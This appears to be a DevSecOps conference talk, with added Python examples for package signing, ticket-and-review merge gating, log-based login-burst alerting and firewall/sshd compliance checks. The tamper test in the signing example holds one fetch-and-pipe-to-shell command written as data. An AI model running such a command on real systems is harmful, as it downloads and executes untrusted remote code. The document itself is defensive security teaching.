DEVSECOPS
TOMAS HONZAK, CISM
CHIEF INFORMATION SECURITY OFFICER
GOODDATA CORPORATION
1
TOMAS HONZAK / DEVSECOPS
IMAGINE YOU HAVE A NICE AGILE COMPANY …
2
AND YOU RUN DEVOPS …
3
BUT THEN, SUDDENLY …
4
WHAT SHALL YOU DO?
“PANIC?”
5
OF COURSE NOT … YOU CAN GET CONSULTANTS!
6
BUT HOW WILL IT END UP?
[Diagram, labels: Release Plan; Change Control Board Approval; Release Manager Approval; Documented Meeting Minutes; Project Manager]
7
AND WE STILL DID NOT ADD ANY “REAL” SECURITY …
[Diagram, labels: Dynamic code analysis; Secure Code Review]
8
IF ONLY THERE WAS A BETTER WAY…
9
KEY DEVSECOPS PRINCIPLES
▸ Embrace the cultural and practical changes
  ▸ Integrate security in the whole lifecycle, from requirements, design and analysis to testing, deployment and operations
▸ Automate your critical processes
  ▸ Automation helps prevent errors and omissions and provides reliable assurance both for you and your auditors
▸ Empower your teams
  ▸ Like all things Agile, the teams must know what they are doing
10
ADDING THE “SEC” INTO DEVOPS PART 1 - DEVSEC
[Pipeline diagram, labels in build order: JIRA # to commit message; “compliance check”; SAST; sign the package; Burp Suite / OWASP ZAP; verify the signature; apply configuration as code; environment: secure and automated, logged, alerted, reviewed]
11
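The “sign the package” / “verify the signature” pair in the pipeline above, as an added example that is not GoodData's pipeline code: the build stage emits a manifest binding the artifact digest and version to a signature, and the deploy stage refuses anything whose bytes, manifest or key do not match. It assumes an HMAC-SHA256 stand-in for a detached signature (so it runs on the standard library alone; a real pipeline would use an asymmetric scheme such as GPG or sigstore/cosign so the deploy side holds only a public key), and the key, artifact and version strings are constructed.

```python
"""Sign a build artifact at the end of the build stage and verify it before
deployment, so only bytes that came out of the pipeline get deployed.
Added example for this page, not GoodData's pipeline code."""
import hashlib
import hmac
import json

# ASSUMPTION: an HMAC-SHA256 "signature" stands in for a detached signature so
# the example runs with the standard library alone. A real pipeline would use
# an asymmetric scheme (GPG, sigstore/cosign) so the deploy side needs only the
# public key and cannot mint signatures itself. The key value is constructed.
SIGNING_KEY = b"build-server-signing-key"


def _manifest_bytes(version: str, digest: str) -> bytes:
    """Canonical encoding of what is signed: digest AND version, so neither can be swapped."""
    return json.dumps({"version": version, "sha256": digest}, sort_keys=True).encode()


def sign_package(artifact: bytes, version: str, key: bytes = SIGNING_KEY) -> dict:
    """Build stage: emit a manifest that travels with the artifact to deployment."""
    digest = hashlib.sha256(artifact).hexdigest()
    sig = hmac.new(key, _manifest_bytes(version, digest), hashlib.sha256).hexdigest()
    return {"version": version, "sha256": digest, "sig": sig}


def verify_package(artifact: bytes, manifest: dict, key: bytes = SIGNING_KEY) -> bool:
    """Deploy stage gate: recompute everything and compare in constant time.
    Any mismatch (altered bytes, edited manifest, wrong key) rejects the deploy."""
    digest = hashlib.sha256(artifact).hexdigest()
    if not hmac.compare_digest(digest, str(manifest.get("sha256", ""))):
        return False
    expected = hmac.new(key, _manifest_bytes(str(manifest.get("version", "")), digest),
                        hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, str(manifest.get("sig", "")))


if __name__ == "__main__":
    pkg = b"#!/bin/sh\necho 'deploying app 1.4.2'\n"  # constructed artifact
    manifest = sign_package(pkg, "1.4.2")
    print(verify_package(pkg, manifest))                              # True
    print(verify_package(pkg + b"curl http://x/p | sh\n", manifest))  # False: bytes changed
    print(verify_package(pkg, dict(manifest, version="1.4.3")))       # False: manifest edited
```

The manifest covers the version as well as the digest on purpose: signing only the bytes would let someone re-label an old, vulnerable build as the current release. A deploy job that gets `False` should stop and log the rejection, which is exactly the “logged, alerted, reviewed” part of the diagram.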
DEVSEC SUMMARY
▸ Move security as far to the left as possible
▸ Enhance your CI/CD pipeline with security testing tools
  ▸ Static Code Analysis (SonarQube)
  ▸ Lightweight penetration testing (Burp / OWASP ZAP)
▸ Enforce change control, approvals and SoD (separation of duties) by gating (Zuul)
  ▸ “JIRA ticket = approval, peer review = SoD”
▸ Secure the environment and log everything
  ▸ (traceability and accountability)
12
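The “JIRA ticket = approval, peer review = SoD” gate in code, as an added example that is neither GoodData's nor Zuul's own implementation: a change is allowed through only if its commit message references a ticket from an approved project, a reviewer other than the author approved it, and the CI checks (SAST, tests) passed. The change-record shape, the approved project keys and the sample changes are constructed assumptions standing in for what a gating system hands to a job.

```python
"""Merge gate for "JIRA ticket = approval, peer review = SoD": a change is
allowed into the gate pipeline only if its commit message references a ticket
from an approved project, someone other than the author approved it, and the
CI checks (SAST, tests) passed. Added example for this page, not GoodData's
or Zuul's code; the change-record shape is a constructed stand-in for what a
gating system hands to a job."""
import re

JIRA_KEY = re.compile(r"\b([A-Z][A-Z0-9]+-\d+)\b")
APPROVED_PROJECTS = {"SEC", "PLAT"}   # constructed: tickets that count as approval


def gate(change: dict):
    """Return (allowed, reasons). All failed checks are reported, not only the
    first, so the developer can fix them in one go."""
    reasons = []
    keys = JIRA_KEY.findall(change["message"])
    if not keys:
        reasons.append("commit message references no JIRA ticket")
    elif not any(k.split("-")[0] in APPROVED_PROJECTS for k in keys):
        reasons.append(f"ticket(s) {keys} are not in an approved project")
    # Separation of duties: the author's own +1 does not count.
    peers = {a for a in change.get("approvals", []) if a != change["author"]}
    if not peers:
        reasons.append("no approval by a reviewer other than the author")
    if change.get("ci") != "success":
        reasons.append("CI checks (SAST, tests) are not green")
    return (not reasons, reasons)


CHANGES = [  # constructed sample change records
    {"id": 101, "author": "alice", "message": "SEC-42 rotate API signing key",
     "approvals": ["bob"], "ci": "success"},
    {"id": 102, "author": "alice", "message": "hotfix, trust me",
     "approvals": ["alice"], "ci": "success"},
    {"id": 103, "author": "carol", "message": "PLAT-7 tighten CORS policy",
     "approvals": ["carol", "dave"], "ci": "failure"},
    {"id": 104, "author": "erin", "message": "FOO-1 bump version",
     "approvals": ["frank"], "ci": "success"},
]


def run_gate(changes):
    """Evaluate every change; the decisions are what the pipeline logs for audit."""
    return {c["id"]: gate(c) for c in changes}


if __name__ == "__main__":
    for cid, (ok, why) in run_gate(CHANGES).items():
        print(cid, "ALLOW" if ok else "BLOCK", why)
```

Change 102 is the interesting one: a self-approved “hotfix” with no ticket is blocked for two independent reasons, and the gate says so for both. Keeping the decision and its reasons in the pipeline log is what lets an auditor later tie every deployed commit to a ticket and a second pair of eyes.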
ADDING THE “SEC” INTO DEVOPS PART 2 - SECOPS
[Diagram, stages in build order: application logs; logged; alerted; reviewed and resolved; escalated; feedback]
13
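The “application logs → logged → alerted → reviewed and resolved / escalated” loop above, as an added example that is not GoodData's detection content: a rule over constructed application log lines raises a medium alert when one source fails authentication five times inside five minutes, escalates to high when a login then succeeds from that source, and routes medium alerts to the on-call rotation and high ones to the CSIRT. The log line format, thresholds, sample lines and routing names are all assumptions made for the example.

```python
"""Detection over application logs: raise an alert when one source fails
authentication THRESHOLD times inside WINDOW, and escalate when a login then
succeeds from that source (a burst followed by success is the case worth a
human immediately). Added example for this page, not GoodData's detection
content. The log line format, thresholds, sample lines and routing are
constructed assumptions."""
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

LINE = re.compile(r"^(?P<ts>\S+) auth (?P<result>ok|fail) user=(?P<user>\S+) src=(?P<src>\S+)$")
WINDOW = timedelta(minutes=5)
THRESHOLD = 5

SAMPLE_LOGS = """\
2024-03-01T10:00:00 auth fail user=bob src=203.0.113.9
2024-03-01T10:00:30 auth fail user=bob src=203.0.113.9
2024-03-01T10:00:45 auth fail user=eve src=198.51.100.4
2024-03-01T10:01:00 auth fail user=bob src=203.0.113.9
2024-03-01T10:01:30 auth fail user=bob src=203.0.113.9
2024-03-01T10:01:40 auth ok user=eve src=198.51.100.4
2024-03-01T10:02:00 auth fail user=bob src=203.0.113.9
2024-03-01T10:02:30 auth fail user=bob src=203.0.113.9
this line is not in the expected format
2024-03-01T10:04:00 auth ok user=bob src=203.0.113.9
"""  # constructed


def detect(lines):
    """Return (alerts, stats). Unparsed lines are counted, not silently dropped:
    a log format change that blinds the rule must itself become visible."""
    recent_fail = defaultdict(deque)          # src -> failure timestamps inside the window
    alerts, stats = [], {"parsed": 0, "unparsed": 0}
    for line in lines:
        m = LINE.match(line)
        if not m:
            stats["unparsed"] += 1
            continue
        stats["parsed"] += 1
        ts, src, user = datetime.fromisoformat(m["ts"]), m["src"], m["user"]
        window = recent_fail[src]
        while window and ts - window[0] > WINDOW:   # slide the window forward
            window.popleft()
        if m["result"] == "fail":
            window.append(ts)
            if len(window) == THRESHOLD:            # fires once per burst, not per line
                alerts.append({"severity": "medium", "rule": "auth failure burst",
                               "src": src, "user": user, "at": m["ts"]})
        elif len(window) >= THRESHOLD:
            alerts.append({"severity": "high", "rule": "success after failure burst",
                           "src": src, "user": user, "at": m["ts"]})
            window.clear()                          # burst handled; start a fresh count
    return alerts, stats


def route(alert):
    """Who picks it up: medium goes to the on-call Ops/Sec rotation for review,
    high is escalated to the virtual CSIRT."""
    return "csirt" if alert["severity"] == "high" else "oncall"


if __name__ == "__main__":
    found, counts = detect(SAMPLE_LOGS.splitlines())
    for a in found:
        print(route(a), a)
    print(counts)
```

Two details matter in practice. The alert fires when the count reaches the threshold, not on every line above it, so one brute-force run produces one ticket rather than hundreds. And the unparsed-line counter is the feedback path in the diagram: when an application release changes its log format, this counter climbing is how the team learns the rule went blind.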
SECOPS SUMMARY
▸ Security built in on all levels
  ▸ Not only “DevSec”, but also non-functional requirements: secrets management, logging, encryption, …
▸ Images / containers / infrastructure / network hardening
  ▸ No unnecessary software, no default passwords, firewalls in deny-all mode, monitored bastion hosts in the DMZ with session logging and strong authentication/authorization …
▸ Configuration management, automated compliance
  ▸ Orchestrated CM, anything-as-code (including firewall rules, access control etc.), code reviews + alerts
▸ Automated threat intelligence, scans, detection, alerting and response
  ▸ Vulnerability scans, HIDS/NIDS, log monitoring and analysis, SIEM, …
▸ Operations and Security combined in the same on-call team
  ▸ Not everyone can be a top-class security expert: keep those in a virtual CSIRT, not in Ops
14
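“Anything-as-code” plus automated compliance, as an added example that is not GoodData's code: firewall rules and an sshd baseline kept as data are checked against policy (default deny, admin ports only from the bastion network, nothing but the public web ports open to the internet, no root login, no password authentication) before they are applied, the same way application code is gated. The rule format, policy constants, bastion network and sample inputs are constructed assumptions; a real pipeline would lint the Terraform or Ansible sources instead.

```python
"""Automated compliance over configuration kept as code: firewall rules and an
sshd baseline are checked against policy before they are applied, the same
way a code review gates application code. Added example for this page, not
GoodData's code. The rule format, policy constants and sample inputs are
constructed assumptions; a real pipeline would lint the Terraform/Ansible
sources instead."""
import ipaddress

ADMIN_PORTS = {22, 3389}
PUBLIC_PORTS = {80, 443}
BASTION_NET = ipaddress.ip_network("10.0.100.0/24")   # constructed


def check_firewall(rules, default_policy):
    """Policy: default deny; admin ports reachable only from the bastion network;
    nothing but the public web ports exposed to 0.0.0.0/0."""
    findings = []
    if default_policy != "deny":
        findings.append("default policy must be deny, found %r" % default_policy)
    for r in rules:
        if r["action"] != "allow":
            continue
        src = ipaddress.ip_network(r["src"])
        from_bastion = src.version == BASTION_NET.version and src.subnet_of(BASTION_NET)
        if r["port"] in ADMIN_PORTS and not from_bastion:
            findings.append(f"rule {r['id']}: admin port {r['port']} allowed from {r['src']}, bastion only")
        elif src.prefixlen == 0 and r["port"] not in PUBLIC_PORTS:
            findings.append(f"rule {r['id']}: port {r['port']} exposed to the whole internet")
    return findings


REQUIRED_SSHD = {"PermitRootLogin": "no", "PasswordAuthentication": "no"}


def check_sshd(config_text):
    """sshd honours the first occurrence of a keyword, so a later 'no' does not
    override an earlier 'yes'; the check mirrors that instead of taking the last."""
    seen = {}
    for raw in config_text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        key, _, value = line.partition(" ")
        seen.setdefault(key, value.strip())
    return [f"{k} must be {v}, found {seen.get(k, 'unset')}"
            for k, v in REQUIRED_SSHD.items() if seen.get(k) != v]


RULES = [  # constructed rules-as-code
    {"id": 1, "action": "allow", "src": "0.0.0.0/0", "port": 443},
    {"id": 2, "action": "allow", "src": "10.0.100.0/24", "port": 22},
    {"id": 3, "action": "allow", "src": "0.0.0.0/0", "port": 22},
    {"id": 4, "action": "allow", "src": "192.0.2.0/24", "port": 5432},
]
SSHD_CONFIG = """\
# constructed sshd_config fragment
Port 22
PermitRootLogin no
PasswordAuthentication yes
PasswordAuthentication no
"""

if __name__ == "__main__":
    for f in check_firewall(RULES, "accept") + check_sshd(SSHD_CONFIG):
        print("FAIL:", f)
```

Run as a pipeline step, a non-empty findings list fails the change; the findings themselves are what gets logged and alerted on. The sshd check deliberately keeps the first value of a keyword because that is what sshd does, so a baseline that appends `PasswordAuthentication no` at the end of a file that already says `yes` passes a naive “last value wins” check while the host stays password-authenticated.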
OH, AND BY THE WAY … WERE YOU WORRIED ABOUT
SECURE BY (DESIGN) DEVSECOPS
15
OK, WE DID THAT ALL. ARE WE 100 % SECURE NOW?
Of course not :) :( but you have decreased the risks a lot:
▸ Increased prevention and detection capabilities
▸ Faster response, no handover between Security and Ops
▸ Faster recovery thanks to automation and *-as-code
▸ Cultural change, better communication and straightforward feedback
16
THANKS FOR
YOUR ATTENTION!

ANY QUESTIONS?
Tomas Honzak
tomas@honzak.cz